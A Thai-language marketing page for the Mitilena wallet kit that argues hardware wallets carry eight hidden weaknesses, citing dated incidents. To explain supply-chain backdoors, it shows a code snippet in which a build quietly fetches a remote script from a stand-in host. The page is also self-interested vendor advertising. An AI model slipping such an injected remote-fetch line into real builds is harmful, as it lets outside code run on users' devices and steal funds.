8 ช่องโหว่ โอเพนซอร์ส เช็คลิสต์ คำถาม
Mitilena Mitilena Wallet กระเป๋าคริปโตเย็น
ONLINE · 22,000+ COINS สร้างกระเป๋าสร้าง
ฮาร์ดแวร์วอลเล็ต · ช่องโหว่ที่ไม่ชัด

ช่องโหว่ที่ไม่ชัดของ ฮาร์ดแวร์วอลเล็ต

คุณซื้ออุปกรณ์เพื่อปิดรู รูใหม่ตามมา: เฟิร์มแวร์ อัปเดต บริการบนคอมพิวเตอร์ ���น้าจอ กล่อง บัญชีผู้ขาย แปดรายละเอียดที่รีวิวเรียกว่าข้อดี — และแปดวิธีที่เงินถูกดึงผ่านสิ่งเหล่านี้ในปี 2020–2026

เคสจริงพร้อมวันที่และยอดเงิน จากเอกสารของผู้ผลิต ชุดของเราวัดด้วยรายการเดียวกัน
ราคาของความผิดพลาดเคสสาธารณะ
2026Coldcard · ความสุ่มอ่อนในเฟิร์มแวร์$100M+
2025Bybit · ผู้ลงนามลงนามสิ่งที่มองไม่เห็น$1.5B
2024Dark Skippy · ซีดรั่วผ่านสองลายเซ็นงานวิจัย
2023Ledger Connect Kit · ประตูหลังในไลบรารี$600K
2021แอปวอลเล็ตปลอมบน App Store17,1 BTC
2020รั่วฐานลูกค้า Ledger · ฟิชชิงหลายปี270,000 คน
แปดช่องโหว่

ทุกรายละเอียดที่รีวิวชมคือรูแยกต่างหาก

ฮาร์ดแวร์วอลเล็ตปิดรูหนึ่ง: คีย์ไม่อยู่บนโทรศัพท์ที่มีอินเทอร์เน็ตอีกต่อไป แต่เครื่องไม่ว่าง มีเฟิร์มแวร์ อัปเดต โปรแกรมเดสก์ท็อป หน้าจอ กล่อง ผู้ขายที่รู้ที่อยู่ของคุณ — และแต่ละรายละเอียดเพิ่มพื้นผิวโจมตีที่คุณไม่เคยมี ด้านล่างแปดรายละเอียดนั้น: รีวิวพูดอะไร เงินถูกดึงอย่างไร วิธีปิดช่องโหว่ และชุดของเรามีรายละเอียดนั้นหรือไม่

ช่องโหว่ 01

เฟิร์มแวร์ที่สร้างคีย์ของคุณ

ในรีวิว: «ชิปปลอดภัย — คีย์ถูกสร้างในเครื่องและไม่เคยออกไป»

คีย์คือตัวเลขสุ่มขนาดใหญ่ และเฟิร์มแวร์เป็นผู้สร้าง ผิดพลาดครั้งเดียว — และจำนวนคีย์น้อยกว่าที่คิดมาก: ถูก brute-force ได้กับเจ้าของทุกคนพร้อมกัน โดยไม่ต้องแตะเครื่อง หลายปีหลังซื้อ ชิปไม่เกี่ยว รูอยู่เหนือมัน

เคส
$100M+
Coldcard กรกฎาคม 2026: ข้อผิดพลาดในบิลด์เฟิร์มแวร์ตั้งแต่ปี 2021 แอบแทนที่ RNG ฮาร์ดแวร์ด้วยเวอร์ชันอ่อน ที่ seed จากหมายเลขเครื่องและตัวจับเวลา ความแข็งแกร่งของคีย์เหลือราว 40 บิต; ที่อยู่กว่า 5,000 ถูกรูดเกลี้ยง
วิธีปิดช่องโหว่
คุณสามารถนำความสุ่มของตัวเองมาได้: ทอยลูกเต๋า วลีของตัวเอง วอลเล็ตที่รับ entropy จากคุณจะไม่พึ่งพาข้อผิดพลาดเฟิร์มแวร์จุดเดียว
เราไม่มีรายละเอียดนี้
บนการ์ดไม่มีเฟิร์มแวร์ — เป็นสื่อเข้ารหัส คีย์ถูกสร้างโดย Mitilena Air จาก RNG ของระบบบนอุปกรณ์ และคุณตั้งวลีซีดของตัวเองแทนคำสุ่มได้
ช่องโหว่ 02

อัปเดตที่คุณต้องติดตั้ง

ในรีวิว: «ผู้ผลิตออกอัปเดตความปลอดภัยเป็นประจำ»

ทุกครั้งที่อัปเดตคือจังหวะที่เฟิร์มแวร์อาจถูกสลับ เฟิร์มแวร์ที่ถูกแทรกซ่อนชิ้นซีดในสอง–สามลายเซ็นปกติ ขณะที่เครื่องภายนอกยังดูปกติ การไม่อัปเดตก็ไม่ได้: รูถูกแก้ด้วยอัปเดตนั่นเอง

เคส
2 ลายเซ็น
Dark Skippy สิงหาคม 2024: นักวิจัยแสดงว่าเฟิร์มแวร์ฮาร์ดแวร์วอลเล็ตที่เป็นอันตรายสามารถดึงซีดทั้งหมดผ่านสองธุรกรรม อัปเ��ตจากที่ผิดเพียงครั้งเดียวก็พอ
วิธีปิดช่องโหว่
เฟิร์มแวร์มาจากไหน และเครื่องยืนยันลายเซ็นของมันหรือไม่ ดีที่สุดคือเมื่อไม่มีอะไรต้องอัปเดต
เราไม่มีรายละเอียดนี้
บนการ์ดไม่มีอะไรให้อัปเดตหรือสลับ การลงนามเกิดในแอปบนโทรศัพท์; บิลด์ถูกเซ็นและมาจาก App Store กับ Google Play — เหมือนแอปอื่นที่คุณเห็นและปิดเอง
ช่องโหว่ 03 · รู้สึกถึงความไร้สาระ
ในรีวิว: «แอปเดสก์ท็อปสะดวกจากผู้ผลิต»

วอลเล็ตเพื่อความไม่ไว้ใจที่มากับบริการพื้นหลัง

คุณซื้ออุปกรณ์ด้วยเหตุผลเดียว: เลิกไว้ใจคอมพิวเตอร์ เพื่อให้มันทำงาน คุณต้องติดตั้งบริการพื้นหลังบนเครื่องเดียวกัน คุณไม่ได้เขียน ไม่ได้เปิด และไม่ได้ควบคุม: มันรันพร้อม OS ฟังพอร์ตที่โปรแกรมใดก็ได้บนเครื่องเรียกได้ และกำลังทำอะไรอยู่ตอนนี้ — อะไรแน่ คุณไม่รู้และจะไม่มีวันพิสูจน์ได้

มันยังค้างพื้นหลังหลังคุณปิดวอลเล็ต เป็นปี ๆ ที่ผู้ผลิตรายใหญ่รายหนึ่งเคยเป็นบริการ «bridge» แยก; ปี 2025 พวกเขายัดเข้าไปในแอป — บริการยังอยู่ แค่ตายพร้อมหน้าต่าง ส่วนใหญ่รายอื่นไม่มีโปรแกรมเดสก์ท็อปแล้วเครื่องก็แค่พวงกุญแจ บน Linux ต้องเพิ่มกฎ udev ไม่งั้นระบบไม่ยอม USB

ดังนั้นสิ่งที่คุณซื้อเพื่อเลิกพึ่งโปรแกรมบนคอมพิวเตอร์ กลับทำงานไม่ได้ถ้าไม่มีโปรแกรมบนคอมพิวเตอร์ และไม่ใช่ตัวที่คุณเห็น — แต่ตัวที่วิ่งอยู่ข้างใต้

เราไม่มีรายละเอียดนี้
ไม่ติดตั้งอะไรบนคอมพิวเตอร์: ไม่มีบริการ ไม่มีไดรเวอร์ ไม่มีพอร์ต คนกลางคือชิป NFC ที่มีอยู่ในโทรศัพท์ ทำโดยผู้ผลิตโทรศัพท์และ OS จัดการ: ทำงานเฉพาะเมื่อแอปเปิดและคุณแตะการ์ดเอง และโทรศัพท์ขออนุญาตทุกครั้ง การ์ดพาสซีฟ: ไม่มีแบต ไม่มีวิทยุ ไม่ทำอะไรเอง ปิดแอป — ไม่เหลืออะไรทำงานโดยไม่มีคุณ ตามตรง: ยังต้องมีแอปบนโทรศัพท์ และมันเหมือนแอปอื่น — คุณเห็น เปิด และปิดเอง ไม่มีใครอยู่ในห้องเก็บของ
ตัวตรวจสอบระบบWALLET CLOSED
โปรเซสสถานะทำงานมาแล้ว
HW Wallet Appwallet
คุณปิดเอง-
hwwalletdบริการพื้นหลัง · สะพาน USB
กำลังทำงาน412d 06:14
ระบบเปิดตอนล็อกอินปิดไม่ได้ — นี่คือบริการ
โมกอัป ชื่อสมมติ นี่คือคอมพิวเตอร์กับหนึ่งในวอลเล็ต USB ยอดนิยมก่อนปี 2025; หลังจากนั้น «bridge» ถูกยัดเข้าแอป — บริการเดิม แค่ไม่โผล่ในรายการอีก
อุปมา
บ้านเพื่อความเป็นส่วนตัว — และผู้เช่าในห้องเก็บของ

คุณอยากได้บ้านเพื่อความเป็นส่วนตัว ซื้อแล้ว แล้วต้องการยาม — ติดตั้ง และเพื่อให้แพ็กเกจยามใช้ได้ พวกเขาขอให้คุณให้คนในเครื่องแบบเข้าบ้าน อยู่ในห้องเก็บของตลอดวันตลอดคืน มีกุญแจทุกประตู และรายงานให้คนอื่น คุณไม่ได้จ้างเขา ไล่ออกไม่ได้ และตอนกลางคืนเขาทำอะไร — คุณไม่รู้

เขา «เป็นคนของเรา» แน่นอน สัญญาเขียนไว้ คุณอยากได้ความเป็นส่วนตัว แต่ได้ของเทียม: บ้านที่มีผู้เช่าที่คุณไม่ได้เลื���ก

ช่องโหว่ 04 · โอเพนซอร์สไม่ใช่การตรวจสอบ
ในรีวิว: «โอเพนซอร์ส — ใครก็ตรวจได้»

โอเพนซอร์สคือวิธีที่โปรแกรมเมอร์ทำงานด้วยกัน ไม่ใช่ตราประทับว่าโปรแกรมไม่ขโมย

โอเพนซอร์สถูกคิดขึ้นเพื่อให้คนแชร์โปรแกรมและแก้ด้วยกัน ในฐานะเครื่องมือร่วมมือมันยอดเยี่ยม มันไม่เคยเป็นตราคุณภาพแบบ «ซอฟต์นี้จะไม่เอาเงินคุณ» และเหตุผลคือ: คุณไม่ได้ใช้ซอร์สโค้ด คุณใช้สิ่งที่ดาวน์โหลดมา

ระหว่างรีโป GitHub กับไฟล์บนโทรศัพท์มีบิลด์ แอปสโตร์ อัปเดต เซิร์ฟเวอร์ ขั้นตอนไหนก็ได้หนึ่งบรรทัดอาจแทรกเข้าโค้ด ดึงอะไรก็ได้จากที่ไหนก็ได้ — และจะไม่มีในรีโป คุณเทียบสำเนาของตัวเองกับซอร์สไม่ได้: สโตร์ส่งไฟล์คอมไพล์แล้ว; วอลเล็ตเว็บได้โค้ดที่เซิร์ฟเวอร์เลือกส่งให้คุณวันนี้; ส่วนขยายเบราว์เซอร์อัปเดตเงียบ ๆ ตอนกลางคืน

«เปิด» หมายความว่าบางคนสามารถตรวจบางเวอร์ชันในบางวันได้ สำเนาของคุณกำลังทำอะไรตอนนี้ — มันไม่ได้บอกอย่างนั้น

ในรีโป · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
บนโทรศัพท์ · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
หนึ่งบรรทัดในบิลด์ ไม่มีในรีโป สโตร์มองไม่เห็น แต่ทำงานบนเครื่องคุณ
ความเปิดไม่ได้กันเคสเหล่านี้ไว้เลย
Ledger Connect Kit2023
ไลบรารีเปิดบน GitHub; เวอร์ชันอันตรายถูกอัปขึ้น npm; หลายสิบไซต์โหลดแบบสดในไม่กี่ชั่วโมง
Copay / event-stream2018
วอลเล็ตเปิด; ประตูหลังมาจาก dependency ที่เล็งมันโดยตรง
xz utils2024
เปิดยี่สิบปี; ประตูหลังอยู่ในรีลีสจนวิศวกรคนหนึ่งสังเกตว่า SSH ล็อกอินช้าขึ้นครึ่งวินาที
Coldcard2026
เฟิร์มแวร์โอเพนซอร์ส; ข้อผิดพลาดบิลด์ห้าปีแทนที่ RNG ฮาร์ดแวร์ด้วยเวอร์ชันอ่อน — คีย์ถูก brute-force โดยไม่แตะเครื่อง ที่อยู่กว่า 5,000, $100M+
อะไรที่ใช้ได้จริง
ไม่ใช่การอ่านโค้ดคนอื่น — แต่เป็นการตรวจสองอย่างที่ใครก็ทำได้ หนึ่ง ตรวจพฤติกรรม: ตั้งพร็อกซีดักบนเครื่องของคุณ ผ่านแอปเข้าไป ดูว่าส่งอะไรไปไหน ไม่ต้องอ่านโค้ด — ทราฟฟิกเห็นหมด สอง สถาปัตยกรรมที่โค้ดไม่มีอะไรให้ขโมย: ถ้าคีย์ไม่เคยอยู่บนเครื่องที่มีเน็ต ทุกบรรทัดในทุกอัปเดตไร้พลัง — ไม่มีอะไรให้ส่ง
แบบของเรา
เราเสนออย่างแรกเอง: ผ่านแอปเราเข้าพร็อกซี เวอร์ชันเว็บผ่าน DevTools ของเบราว์เซอร์ แล้วดูทุกคำขอ คีย์ลงนามและซีดจะไม่โผล่; ข้อยกเว้นเดียวคือ Monero view key — บอกไว้ในหน้า «โอนออกอย่างไร» อย่างที่สองอยู่ในชุด: คีย์เกิดใน Mitilena Air บนเครื่องไม่มีอินเทอร์เน็ต อยู่บนการ์ด และเข้าแอปออนไลน์มีแค่ลายเซ็น — ที่นั่นไม่มีอะไรให้พร็อกซี และออฟไลน์ตรงนี้ของจริง: โหมด air-gap เครื่องที่มีคีย์ไม่ต่ออะไร — ไม่สาย ไม่ Bluetooth; ธุรกรรมเข้าออกด้วย QR ที่คุณเห็นด้วยตา ไม่ใช่กระเป๋า «เย็น» ห้อย���ายบนคอมออนไลน์พร้อมบริการของมันและแลกอะไรก็ไม่รู้
ช่องโหว่ 05

หน้าจอที่มองไม่เห็นว่าคุณกำลังลงนามอะไร

ในรีวิว: «ยืนยันบนหน้าจอเครื่อง — ไวรัสบนคอมทำอะไรไม่ได้»

หน้าจอเล็ก และบ่อยครั้งโชว์แฮชหรือ «เรียกสัญญา» ไม่ใช่ที่อยู่และจำนวน คุณยืนยันสิ่งที่มองไม่เห็น — และลายเซ็นยังของจริง ของคุณ หน้าจอให้ความรู้สึกควบคุมที่จริง ๆ ไม่มี

เคส
$1.5B
Bybit กุมภาพันธ์ 2025: ผู้ลงนามด้วยฮาร์ดแวร์วอลเล็ทยืนยันการโอนที่บน UI ดูปกติ เครื่องแสดงข้อมูลที่คนเทียบไม่ได้
วิธีปิดช่องโหว่
ผู้รับ จำนวน และประเภทการทำรายการเป็นภาษามนุษย์ — ไม่ใช่แฮช — และปุ่มปฏิเสธกดครั้งเดียว
แบบของเรา
มีหน้าจอ แต่เป็นหน้าจอโทรศัพท์: ที่อยู่ จำนวน และประเภทคำขอเป็นคำ — โอน เรียกสัญญา อนุญาต — และปุ่ม «ปฏิเสธ» สำหรับยอดใหญ่ — เครื่องออฟไลน์แยกที่รับธุรกรรมทั้งก้อน
ช่องโหว่ 06

กล่องที่มีซีดอยู่แล้ว

ในรีวิว: «มาในกล่องปิดผนึกพร้อมสติกเกอร์กันเปิด»

อุปกรณ์กายภาพหมายถึงการจัดส่ง คนกลาง และมาร์เก็ตเพลส «ลดราคา» วอลเล็ตมาพร้อมตั้งค่าแล้ว มีซีดบนกระดาษในกล่อง หรือแอปปลอมในสโตร์ให้คุณ «ใส่ซีดเพื่อเปิดใช้»

เคส
17,1 BTC
App Store ปี 2021: เจ้าของฮาร์ดแวร์วอลเล็ตใส่ซีดในแอปปลอมและเสีย 17,1 BTC ปีเดียวกัน หลังฐานข้อมูลรั่ว ลูกค้า Ledger ได้รับเครื่องปลอมพร้อมจดหมาย «ย้ายซีดไปเครื่องใหม่»
วิธีปิดช่องโหว่
เริ่มต้นเอง และอย่าใช้ซีดที่มาเขียนไว้แล้ว สติกเกอร์ไม่ใช่การตรวจ; การตรวจคือคุณสร้างคีย์เอง
แบบของเรา
การ์ดมาว่าง: คุณสร้างคีย์และเขียนเอง — ในกล่องไม่มีซีดสำเร็จรูป แอปมาจาก App Store และ Google Play ผ่านลิงก์บนเว็บเท่านั้น; ถามซีดเฉพาะตอนนำเข้าและตอนลงนาม
ช่องโหว่ 07

บัญชีกับผู้ขาย

ในรีวิว: «รับประกันทางการ ซัพพอร์ต และบัญชีส่วนตัว»

เพื่อซื้อเครื่อง คุณให้ผู้ผลิตชื่อ อีเมล และที่อยู่จัดส่ง ความปลอดภัยของคุณตอนนี้ขึ้นกับฐานข้อมูลของเขา ถ้ารั่ว — คุณจะได้รับข้อความ «ยืนยันซีดบนเครื่องใหม่» เป็นปี ๆ บางครั้งมีพัสดุด้วย

เคส
270,000 คน
Ledger ปี 2020: ข้อมูลผู้ซื้อ 270,000 คนรั่ว รวมที่อยู่ไปรษณีย์ อีเมล โทร และพัสดุที่ขอ «migrate» ซีดยังมาถึงทุกวันนี้
วิธีปิดช่องโหว่
พวกเขารู้เกี่ยวกับคุณน้อยเท่าไหร่ เวกเตอร์ยิ่งสั้น: ซื้อโดยไม่มีบัญชี ซัพพอร์ตไม่เคยถามซีด และกฎ «มีแต่ขโมยที่ถามซีด»
เราไม่มีรายละเอียดนี้
วอลเล็ตทำงานโดยไม่ต้องสมัคร — ไม่มีบัญชี ผู้ขายรู้แค่ที่อยู่จัดส่ง ทั้งซัพพอร์ตและแอปไม่ถามซีด
ช่องโหว่ 08

เครื่องเดียวกับกระดาษแผ่นเดียว

ในรีวิว: «ตัวเครื่องทน หน้าจอใหญ่ แบตอยู่ได้ทั้งสัปดาห์»

ชิ้นส่วนยิ่งมากยิ่งพังง่าย: พอร์ต หน้าจอ แบต การกู้คืนผูกกับกระดาษซีดแผ่นเดียว — เปียก หายตอนย้ายบ้าน ถ่ายรูป «เผื่อไว้» สาเหตุเสียหายที่พบบ่อยสุดไม่ใช่แฮ็ก

เคส
≈20 % BTC
Chainalysis ประมาณว่าประมาณหนึ่งในห้าของบิตคอยน์หายไปตลอดกาล — ส่วนใหญ่เพราะคีย์หาย ไม่ใช่แฮ็ก
วิธีปิดช่องโหว่
ในกล่องมีสำเนาคีย์กี่ชุดและรูปแบบใด เครื่องหายแล้วเกิดอะไร มีอะไรในเครื่องที่พังได้หรือไม่
เราไม่มีรายละเอียดนี้
ไม่มีหน้าจอ แบต หรือพอร์ต — ไม่มีอะไรให้พัง และไม่ใช่สำเนาเดียว: ห้าชุดกระจกใ��กล่อง — สองการ์ด NFC และสามสติกเกอร์ลับในพลาสติกกันน้ำ อายุ 10+ ปี
เช็คลิสต์

สิ่งที่ไม่ควรมีในวอลเล็ต

แปดรายละเอียดตามแปดช่องโหว่ รายการใช้ได้กับวอลเล็ตทุกชนิด — ฮาร์ดแวร์ มือถือ เบราว์เซอร์ ทำเครื่องหมายว่าอันที่คุณเลือกมีอะไร — และของเราด้วย

01
คีย์ที่สร้างโดยโปรแกรมอย่างเดียวโดยไม่มีความสุ่มของคุณ — วลีหรือลูกเต๋า
02
อัปเดตตรงที่คีย์อยู่ทุกอัปเดตคือโอกาสสลับโค้ด
03
บริการ ไดรเวอร์ หรือพอร์ตบนคอมพิวเตอร์ดูช่องโหว่ 03
04
ตรา «open source» แทนสถาปัตยกรรมคีย์อยู่ที่โค้ดคนอื่นเข้าถึงได้
05
หน้าจอโชว์แฮชแทนที่อยู่และจำนวนและไม่มีปุ่ม «ปฏิเสธ»
06
ซีดที่มาเขียนไว้แล้วในกล่อง ในจดหมาย ใน «แอปเปิดใช้»
07
บัญชีกับผู้ขายและซัพพอร์ตที่อาจถามซีด
08
สำเนาเดียวกับชิ้นส่วนที่พังง่ายหน้าจอ แบต พอร์ต กระดาษแผ่นเดียว
ตามรายการนี้ ชุด Ultimate ไม่มีทั้งแปดรายละเอียด ในกล่อง: ก��ร์ด NFC 2 ใบและสติกเกอร์ลับ 3 แผ่น, Mitilena Air (คีย์ไม่มีอินเทอร์เน็ต) และ Mitilena Keys (ลงนามไม่มีอินเทอร์เน็ต) การ์ดมาว่าง: คุณสร้างและเข้ารหัสคีย์ — ไม่ใช่ชิปโรงงาน องค์ประกอบและราคา →
Ultimate · ชุดออฟไลน์

ไม่ใช่ «ชิปปลอดภัย» จากโรงงาน — สื่อที่คุณเข้ารหัสเอง

การ์ดมาว่าง คุณสร้างคีย์ใน Mitilena Air บนโทรศัพท์ไม่มีอินเทอร์เน็ตแล้วเขียนเอง ลงนามผ่าน Mitilena Keys ออฟไลน์เช่นกัน: ธุรกรรมไปด้วย QR ห้าชุดเหมือนกันในกล่อง: การ์ด NFC 2 ใบและสติกเกอร์ลับ 3 แผ่นในพลาสติกกันน้ำ 18 เครือข่าย กว่า 20,000 เหรียญ รวม USDT

ไม่ติดตั้งอะไรบนคอมพิวเตอร์
ไม่มีเฟิร์มแวร์ ���ัปเดต หน้าจอ หรือแบต
ธุรกรรมไปยังโทรศัพท์ออฟไลน์ — ด้วยเสียงหรือ QR ไม่มีสายหรือ USB
ทำงานกับแอป Mitilena ฟรีบนโทรศัพท์
พลาสติกกันน้ำ อายุบนชั้น 10+ ปี
จัดส่งทั่วโลก · mitilena-store.com
การ์ด NFC Mitilena
Ultimate · สร้างและลงนามออฟไลน์
€369€439
การ์ด NFC 2 · สติกเกอร์ลับ 3 · Mitilena Air · ใบอนุญาต Mitilena Keys
ซื้อ Ultimate · €369 Basic และ Premium — ดูทุกแพ็กเกจ
คำถาม

คนถามอะไรหลังอ่านถึงตรงนี้

ข้อดีข้อเสียฮาร์ดแวร์วอลเล็ต — ฉบับสั้น?

ข้อดีใหญ่ข้อเดียว: คีย์ไม่อยู่บนโทรศัพท์ที่มีอินเทอร์เน็ต ข้อเสียคือแปดรายละเอียดด้านบน — แต่ละอันเพิ่มพื้นผิวโจมตี ฮาร์ดแวร์วอลเล็ตที่ดีคืออันที่มีรายละเอียดน้อยกว่า ไม่ใช่มากกว่า

ถ้าโทรศ���พท์ถูกเจาะล่ะ?

เมื่อการ์ดอยู่บนโทรศัพท์หลัก คีย์โผล่ในสภาพแวดล้อมแยกเฉพาะวินาทีลงนาม — ความเสี่ยงแบบเดียวกับวอลเล็ตมือถือทั่วไป แค่สั้นกว่า สำหรับยอดที่คุณกลัว — ชั้นสอง: ลงนามบนเครื่องออฟไลน์แยก ธุรกรรมมาด้วย QR

ถ้าการ์ดหายหรือถูกขโมยล่ะ?

ไม่มีรหัสผ่าน การ์ดกับสติกเกอร์ก็แค่พลาสติกไร้ค่า — คีย์บนนั้นเข้ารหัสแล้ว สำเนาที่หายถูกแทนด้วยอีกสี่ชุด: สองการ์ดและสามสติกเกอร์ในกล่องเป็นกระจกกัน

ต้องอัปเดตเฟิร์มแวร์ฮาร์ดแวร์วอลเล็ตไหม?

ถ้าผู้ผลิตปะรู — ต้อง และตอนนั้นเองเฟิร์มแวร์อาจถูกสลับ: ตรวจแหล่งและลายเซ็น สื่อที่ไม่มีเฟิร์มแวร์ไม่มีทางเลือกนั้น — ไม่มีอะไรให้อัปเดต ไม่มีอะไรให้สลับ

ต่างจากวอลเล็ต USB อย่างไร?

คนกลางน้อยกว่า: ไม่มีสาย ไดรเวอร์ บริการพื้นหลัง หรือโปรแกรมเดสก์ท็อป คนกลางหนึ่ง — ชิป NFC ของโทรศัพท์คุณ — และมันรับผิดชอบกับคุณพร้อม OS ไม่ใช่กับผู้ผลิตวอลเล็ต

โอเพนซอร์สแปลว่าปลอดภัย?

แปลว่าใครบางคน บางเวลา ตรวจได้ คุณไม่ได้ใช้โค้ด แต่ใช้สิ่งที่ดาวน์โหลด และเทียบสองอย่างนั้นไม่ได้ ความปลอดภัยมาจากสถาปัตยกรรมที่คีย์ไม่อยู่ในที่ที่โค้ดแปลกเข้าถึงได้

การ์ด NFC พร้อมสร้างและลงนามออฟไลน์

ซื้อ Ultimate · €369 สร้างกระเป๋าฟรี